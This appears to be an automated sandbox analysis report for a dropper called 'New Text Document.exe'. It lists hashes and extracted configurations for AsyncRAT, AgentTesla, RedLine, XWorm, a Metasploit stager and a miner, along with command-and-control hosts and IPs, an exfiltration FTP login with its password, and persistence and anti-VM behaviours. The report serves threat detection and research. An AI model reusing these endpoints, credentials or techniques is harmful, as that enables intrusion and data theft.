Analysis
- max time kernel: 281s
- max time network: 1801s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 26-05-2024 17:22
Static task: static1

Behavioral tasks:
Task | Sample | Resource
behavioral1 | New Text Document.exe | win10-20240404-en
behavioral2 | New Text Document.exe | win7-20240508-en
behavioral3 | New Text Document.exe | win10v2004-20240508-en
behavioral4 | New Text Document.exe | win11-20240426-en
behavioral5 | New Text Document.exe | android-x64-20240514-en
behavioral6 | New Text Document.exe | android-x64-arm64-20240514-en
behavioral7 | New Text Document.exe | android-33-x64-arm64-20240514-en
behavioral8 | New Text Document.exe | android-x86-arm-20240514-en
behavioral9 | New Text Document.exe | macos-20240410-en
behavioral10 | New Text Document.exe | debian12-armhf-20240221-en
behavioral11 | New Text Document.exe | debian12-mipsel-20240418-en
behavioral12 | New Text Document.exe | debian9-armhf-20240226-en
behavioral13 | New Text Document.exe | debian9-mipsbe-20240418-en
behavioral14 | New Text Document.exe | debian9-mipsel-20240418-en
behavioral15 | New Text Document.exe | ubuntu1804-amd64-20240508-en
behavioral16 | New Text Document.exe | ubuntu2004-amd64-20240508-en
behavioral17 | New Text Document.exe | ubuntu2204-amd64-20240522.1-en
behavioral18 | New Text Document.exe | ubuntu2404-amd64-20240523-en
General
- Target: New Text Document.exe
- Size: 4KB
- MD5: a239a27c2169af388d4f5be6b52f272c
- SHA1: 0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
- SHA256: 98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
- SHA512: f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
- SSDEEP: 48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt
Malware Config

Extracted
https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002

Extracted
Protocol: ftp
Host: ftp.midhcodistribuciones.com
Port: 21
Username: [email protected]
Password: ,A7}+JV4KExQ

Extracted
asyncrat
3LOSH RAT
Exodus_Market
leetboy.dynuddns.net:1339
AsyncMutex_6SI8OkPnk
- delay: 3
- install: true
- install_file: svchos.exe
- install_folder: %AppData%

Extracted
asyncrat
3LOSH RAT
LNKK
leetboy.dynuddns.net:1338
AsyncMutex_6h2caasdas2133sOkPnk
- delay: 3
- install: false
- install_folder: %AppData%

Extracted
risepro
118.194.235.187:50500

Extracted
asyncrat
3LOSH RAT
Load_Man
leetman.dynuddns.com:1337
AsyncMutex_6SI8asdasd2casOkPnk
- delay: 3
- install: false
- install_folder: %AppData%

Extracted
redline
@OLEH_PSP
185.172.128.33:8970

Extracted
agenttesla
Protocol: ftp
Host: ftp://ftp.midhcodistribuciones.com
Port: 21
Username: [email protected]
Password: ,A7}+JV4KExQ

Extracted
metasploit
metasploit_stager
129.159.151.146:3344

Extracted
xworm
5.0
45.141.26.119:1996
45.141.27.41:7000
85.203.4.146:7000
wHK5NlknpAL3Lk1X
- Install_directory: %AppData%
- install_file: csrss.exe
Signatures

- AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.

- Detect Xworm Payload (6 IoCs)
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\a\csrss.exe | family_xworm
C:\Users\Admin\XClient.exe | family_xworm
behavioral3/memory/6364-859-0x0000000000CB0000-0x0000000000CC0000-memory.dmp | family_xworm
behavioral3/memory/1280-861-0x0000000000FD0000-0x0000000000FE0000-memory.dmp | family_xworm
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe | family_xworm
behavioral3/memory/6956-1137-0x0000000000C10000-0x0000000000C20000-memory.dmp | family_xworm
- MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

- Modifies firewall policy service (2 TTPs, 2 IoCs)
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | AppGate2103v15.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | nO20MXBUGloxh9agdli788Vc.exe

- Phorphiex payload (2 IoCs)
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe | family_phorphiex
C:\Windows\syslmgrsvc.exe | family_phorphiex
- PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

- RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

- RedLine payload (1 IoCs)
Processes:
resource | yara_rule
behavioral3/memory/2284-217-0x0000000000400000-0x0000000000452000-memory.dmp | family_redline

- Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
Processes:
description | pid | process | target process
PID 4584 created 3436 | 4584 | Fighting.pif | Explorer.EXE
PID 4584 created 3436 | 4584 | Fighting.pif | Explorer.EXE

- XMRig Miner payload (2 IoCs)
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\a\print.exe | family_xmrig
C:\Users\Admin\AppData\Local\Temp\a\print.exe | xmrig

- Async RAT payload (2 IoCs)
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\a\start.exe | family_asyncrat
C:\Users\Admin\AppData\Local\Temp\a\regasms.exe | family_asyncrat
- Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 4 IoCs)
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | AppGate2103v15.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | oiktbrfhNygCPSFVdJ1Rkgku.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | nO20MXBUGloxh9agdli788Vc.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | AppGate2103v01.exe

- Blocklisted process makes network request (2 IoCs)
Processes:
flow | pid | process
748 | 6388 | oaNMFMP.exe
754 | 6388 | oaNMFMP.exe

- Command and Scripting Interpreter: PowerShell (1 TTPs, 24 IoCs)
Runs PowerShell with its display window hidden.
Processes:
pid | process
4268 | powershell.exe
4540 | powershell.exe
6940 | powershell.exe
6524 | powershell.exe
2420 | powershell.exe
6180 | powershell.exe
4028 | powershell.exe
6864 | powershell.exe
4576 | powershell.exe
6956 | powershell.EXE
4592 | powershell.exe
1216 | powershell.exe
6064 | powershell.exe
368 | powershell.exe
5928 | powershell.exe
5164 | powershell.exe
6828 | powershell.exe
6764 | powershell.exe
3132 | powershell.exe
6760 | powershell.exe
5248 | powershell.exe
5940 | powershell.exe
4112 | powershell.exe
2340 | powershell.exe
- Contacts a large (650) amount of remote hosts (1 TTPs)
This may indicate a network scan to discover remotely running services.

- Creates new service(s) (2 TTPs)

- Downloads MZ/PE file

- Drops file in Drivers directory (2 IoCs)
Processes:
description | ioc | process
File created | C:\Windows\system32\drivers\etc\hosts | GoogleUpdateTaskMachineQCW.exe
File created | C:\Windows\system32\drivers\etc\hosts | updater.exe

- Possible privilege escalation attempt (2 IoCs)
Processes:
pid | process
1696 | takeown.exe
6348 | icacls.exe
- Checks BIOS information in registry (2 TTPs, 11 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | AppGate2103v15.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | oiktbrfhNygCPSFVdJ1Rkgku.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | AppGate2103v01.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | AppGate2103v15.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | oiktbrfhNygCPSFVdJ1Rkgku.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | nO20MXBUGloxh9agdli788Vc.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | nO20MXBUGloxh9agdli788Vc.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | AppGate2103v01.exe
- Checks computer location settings (2 TTPs, 14 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | DlRIpsJ.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | MartDrum.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | oiii.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | Bypass3_Pure_Mode.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | oaNMFMP.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | New Text Document.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | start.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | csrss.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | Setup.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | conhost.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | Install.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | XClient.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | rem.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | Install.exe
- Drops startup file (16 IoCs)
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoseidonSense.url | cmd.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HcOGmFZ1RLXW4uIIpLU2hLPd.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yNCJ6waxU0YxbzWd4YMDtOO8.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk | csrss.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | svchost.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5YloKvOAHb0FXPe0yqvNHpfL.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5TqBLh6Dojf6Um8NwJfDgOka.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk | XClient.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | svchost.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jDuVUAip2Z7hUWIX59tHw5Go.bat | msbuild.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk | csrss.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoseidonSense.url | cmd.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rxvin71EaiQPSRy817RU6TR6.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XdpYmPDCVt9rCyMVdgv77Mog.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EJjXWT0H70MtM063Q0T95cZR.bat | msbuild.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iC70tSpUgxde3BIQj9kO628h.bat | msbuild.exe
- Executes dropped EXE (64 IoCs)
Processes:
pid | process
2508 | MartDrum.exe
3052 | 4.exe
4436 | start.exe
3524 | rem.exe
5028 | svcs.exe
3356 | rooma.exe
4584 | Fighting.pif
4772 | regasms.exe
2676 | Zinck2.exe
4948 | Zinckeds.exe
4216 | svchos.exe
5372 | jsc.exe
4052 | go.exe
5920 | crypted.exe
2348 | aaaaaaaa.exe
3164 | AppGate2103v15.exe
6752 | server.exe
2464 | wxijgyp.exe
4108 | time2time.exe
5792 | an4IhMEUJGaXcuvcgGd8PX9U.exe
4240 | file300un.exe
6428 | AIrj5QVEYuGuBGBtXUl948x8.exe
3664 | dheliGO8vZJZX17tAGdW1JAq.exe
6704 | oiktbrfhNygCPSFVdJ1Rkgku.exe
6832 | i4NmxEpmuAkauKUZZPpG91uN.exe
6824 | Install.exe
5680 | zwuivg.exe
4480 | nO20MXBUGloxh9agdli788Vc.exe
3340 | eZLzlDEi6dGI8UUD1hmA2jyZ.exe
1928 | Install.exe
5976 | AppGate2103v01.exe
6580 | rtx.exe
7056 | rtx.exe
7100 | example.exe
7136 | win-test.exe
1052 | backdoor.exe
4840 | Install.exe
2148 | asdf.exe
6360 | wsiopohwqsd.exe
6116 | QEwecfyhj.exe
3044 | Bypass3_Pure_Mode.exe
5400 | example.exe
6364 | csrss.exe
1280 | XClient.exe
5512 | Install.exe
2060 | SrbijaSetupHokej.exe
2824 | SrbijaSetupHokej.tmp
5836 | GoogleUpdateTaskMachineQCW.exe
5672 | gywervcyuj.exe
5984 | ngown.exe
1016 | gHIvTf22qvmZjum.exe
5052 | updater.exe
2188 | Setup.exe
6956 | svchost.exe
4212 | crt.exe
7064 | crt.tmp
6924 | submoremediaplayer32.exe
4108 | submoremediaplayer32.exe
6040 | DlRIpsJ.exe
7128 | oiii.exe
6388 | oaNMFMP.exe
6760 | gHIvTf22qvmZjum.exe
4988 | wmpnetwk.exe
6284 | wmixedwk.exe
- Loads dropped DLL (8 IoCs)
Processes:
pid | process
5792 | an4IhMEUJGaXcuvcgGd8PX9U.exe
7064 | crt.tmp
6896 | rundll32.exe
4988 | wmpnetwk.exe
6284 | wmixedwk.exe
6436 | 7z.exe
2260 | 7z.exe
6748 | 7z.exe

- Modifies file permissions (1 TTPs, 2 IoCs)
Processes:
pid | process
1696 | takeown.exe
6348 | icacls.exe

- Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

- Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.

- Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v15.exe | themida
behavioral3/memory/3164-267-0x0000000140000000-0x0000000140DF9000-memory.dmp | themida
behavioral3/memory/3164-270-0x0000000140000000-0x0000000140DF9000-memory.dmp | themida
behavioral3/memory/3164-271-0x0000000140000000-0x0000000140DF9000-memory.dmp | themida
behavioral3/memory/3164-268-0x0000000140000000-0x0000000140DF9000-memory.dmp | themida
behavioral3/memory/3164-269-0x0000000140000000-0x0000000140DF9000-memory.dmp | themida
behavioral3/memory/3164-287-0x0000000140000000-0x0000000140DF9000-memory.dmp | themida
behavioral3/memory/6704-479-0x0000000140000000-0x0000000140DF9000-memory.dmp | themida
behavioral3/memory/6704-497-0x0000000140000000-0x0000000140DF9000-memory.dmp | themida
behavioral3/memory/6704-495-0x0000000140000000-0x0000000140DF9000-memory.dmp | themida
behavioral3/memory/6704-494-0x0000000140000000-0x0000000140DF9000-memory.dmp | themida
behavioral3/memory/6704-496-0x0000000140000000-0x0000000140DF9000-memory.dmp | themida
behavioral3/memory/6704-509-0x0000000140000000-0x0000000140DF9000-memory.dmp | themida
C:\Users\Admin\Pictures\nO20MXBUGloxh9agdli788Vc.exe | themida
behavioral3/memory/4480-572-0x0000000140000000-0x0000000140C37000-memory.dmp | themida
behavioral3/memory/5976-638-0x0000000140000000-0x0000000140C37000-memory.dmp | themida
behavioral3/memory/5976-651-0x0000000140000000-0x0000000140C37000-memory.dmp | themida
behavioral3/memory/4480-1055-0x0000000140000000-0x0000000140C37000-memory.dmp | themida

Processes:
resource | yara_rule
behavioral3/memory/7056-656-0x0000000000400000-0x0000000000848000-memory.dmp | upx
behavioral3/memory/7056-1089-0x0000000000400000-0x0000000000848000-memory.dmp | upx
- Unexpected DNS network traffic destination (23 IoCs)
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description | ioc
Destination IP | 54.76.137.194
Destination IP | 52.209.50.186
Destination IP | 54.194.139.231
Destination IP | 54.194.203.69
Destination IP | 54.76.137.194
Destination IP | 91.211.247.248
Destination IP | 54.194.203.69
Destination IP | 54.194.203.69
Destination IP | 54.194.203.69
Destination IP | 54.76.137.169
Destination IP | 54.194.203.69
Destination IP | 91.211.247.248
Destination IP | 54.194.203.69
Destination IP | 54.194.203.69
Destination IP | 54.76.137.194
Destination IP | 54.194.213.132
Destination IP | 54.76.137.194
Destination IP | 54.194.203.69
Destination IP | 52.209.50.186
Destination IP | 54.76.137.169
Destination IP | 54.194.203.69
Destination IP | 54.76.137.169
Destination IP | 54.76.137.169

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\a\server.exe | vmprotect
behavioral3/memory/6752-298-0x00007FF7B6A40000-0x00007FF7B7319000-memory.dmp | vmprotect
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

- Adds Run key to start application (2 TTPs, 5 IoCs)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\microsofts\\svcs.exe\"" | svcs.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" | rtx.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\microsofts\\svcs.exe\"" | rem.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\microsofts\\svcs.exe\"" | rem.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\microsofts\\svcs.exe\"" | svcs.exe

- Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | AppGate2103v15.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | oiktbrfhNygCPSFVdJ1Rkgku.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | nO20MXBUGloxh9agdli788Vc.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | AppGate2103v01.exe
- Drops Chrome extension (3 IoCs)
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | DlRIpsJ.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | oaNMFMP.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | DlRIpsJ.exe

- Drops desktop.ini file(s) (1 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | DlRIpsJ.exe

- Enumerates connected drives (3 TTPs, 22 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description | ioc | process
File opened (read-only) | \??\G: | server.exe
File opened (read-only) | \??\L: | server.exe
File opened (read-only) | \??\Q: | server.exe
File opened (read-only) | \??\E: | server.exe
File opened (read-only) | \??\H: | server.exe
File opened (read-only) | \??\K: | server.exe
File opened (read-only) | \??\P: | server.exe
File opened (read-only) | \??\V: | server.exe
File opened (read-only) | \??\I: | server.exe
File opened (read-only) | \??\N: | server.exe
File opened (read-only) | \??\O: | server.exe
File opened (read-only) | \??\X: | server.exe
File opened (read-only) | \??\Y: | server.exe
File opened (read-only) | \??\B: | server.exe
File opened (read-only) | \??\J: | server.exe
File opened (read-only) | \??\M: | server.exe
File opened (read-only) | \??\R: | server.exe
File opened (read-only) | \??\S: | server.exe
File opened (read-only) | \??\T: | server.exe
File opened (read-only) | \??\U: | server.exe
File opened (read-only) | \??\W: | server.exe
File opened (read-only) | \??\Z: | server.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 22 IoCs)
Processes:
flow | ioc
831 | pastebin.com
833 | pastebin.com
1734 | pastebin.com
2450 | pastebin.com
2452 | pastebin.com
55 | raw.githubusercontent.com
476 | pastebin.com
514 | pastebin.com
1772 | pastebin.com
2045 | pastebin.com
2889 | pastebin.com
1240 | pastebin.com
1241 | pastebin.com
1733 | pastebin.com
2046 | pastebin.com
2054 | pastebin.com
2887 | pastebin.com
54 | raw.githubusercontent.com
349 | pastebin.com
1296 | pastebin.com
2465 | pastebin.com
2901 | pastebin.com

- Looks up external IP address via web service (11 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
402 | api.myip.com
406 | ipinfo.io
407 | ipinfo.io
558 | api.myip.com
562 | ipinfo.io
681 | ip-api.com
405 | api.myip.com
473 | ip-api.com
559 | api.myip.com
561 | ipinfo.io
615 | ip-api.com

- Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoCs)
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
description | ioc | process
File opened for modification | \??\PhysicalDrive0 | an4IhMEUJGaXcuvcgGd8PX9U.exe

- AutoIT Executable (7 IoCs)
AutoIT scripts compiled to PE executables.
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\a\go.exe | autoit_exe
C:\Users\Admin\AppData\Local\Temp\a\wxijgyp.exe | autoit_exe
C:\Users\Admin\AppData\Local\Temp\a\zwuivg.exe | autoit_exe
C:\Users\Admin\AppData\Local\Temp\a\wsiopohwqsd.exe | autoit_exe
C:\Users\Admin\AppData\Local\Temp\a\QEwecfyhj.exe | autoit_exe
C:\Users\Admin\AppData\Local\Temp\a\gywervcyuj.exe | autoit_exe
C:\Users\Admin\AppData\Local\Temp\a\ngown.exe | autoit_exe
- Drops file in System32 directory (47 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | AppGate2103v15.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | DlRIpsJ.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | oaNMFMP.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | AppGate2103v15.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | DlRIpsJ.exe
File opened for modification | C:\Windows\System32\GroupPolicy | AppGate2103v15.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 | DlRIpsJ.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | DlRIpsJ.exe
File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Local\1308.hecate | svchost.exe
File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Local\info | svchost.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | nO20MXBUGloxh9agdli788Vc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 | DlRIpsJ.exe
File opened for modification | C:\Windows\System32\GroupPolicy | nO20MXBUGloxh9agdli788Vc.exe
File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | nO20MXBUGloxh9agdli788Vc.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | nO20MXBUGloxh9agdli788Vc.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | Install.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | DlRIpsJ.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 | DlRIpsJ.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | AppGate2103v15.exe
File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Local\5240.hecate | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 | DlRIpsJ.exe
